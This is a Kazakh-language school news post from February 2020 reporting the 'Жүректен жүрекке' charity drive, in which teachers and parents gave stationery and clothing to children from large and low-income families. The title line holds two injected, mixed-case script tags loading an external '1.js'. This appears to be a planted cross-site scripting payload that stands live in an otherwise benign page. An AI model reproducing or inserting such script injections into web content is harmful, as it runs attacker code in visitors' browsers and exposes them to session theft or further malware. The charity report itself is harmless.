«Жүректен жүрекке» қайырымдылық акциясы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.02.2020

«Жүректен жүрекке» қайырымдылық акциясы

                   «Өзін-өзі тану: Сүйіспеншілік пен шығармашылық педагогикасы» онкүндігі аясында көпбалалы және тұрмысы төмен отбасылардың балаларына материалдық көмек көрсету мақсатында «Жүректен жүрекке» қайырымдылық акциясы өтті. Акцияның ұраны: «Жақсылық жасауға асығыңыз».

                  Оның негізгі идеясы - өмірдің қандай жағдайлары болмасын, қиын жағдайға ұшыраған адамдардан бас тартуға болмайды. Біз барлық мүдделі адамдарға біздің акцияға қатысуға өтініш білдіріп, олардың қолдауын таптық.

                 Акцияға мұғалімдер мен ата-аналар қатысты. Біздің демеушімізге, мектептің қамқоршылық кеңесінің мүшесі - «Найля» шаруа қожалығының жетекшісі Водко В.В. ерекше алғыс білдіреміз. Қатысушылардың барлығының мейірімділігінің арқасында біз балаларға кеңсе тауарлары мен киім-кешек сыйладық.

                Мұндай іс-әрекеттер мейірімділік идеясын, өзара көмек, қолдау сезімін таратады және адамдарды позитивті және игі істер жасауға итермелейді.

Просмотров: 832


Пікір қосу



Деректерді қолтаңбаға қосу
Текст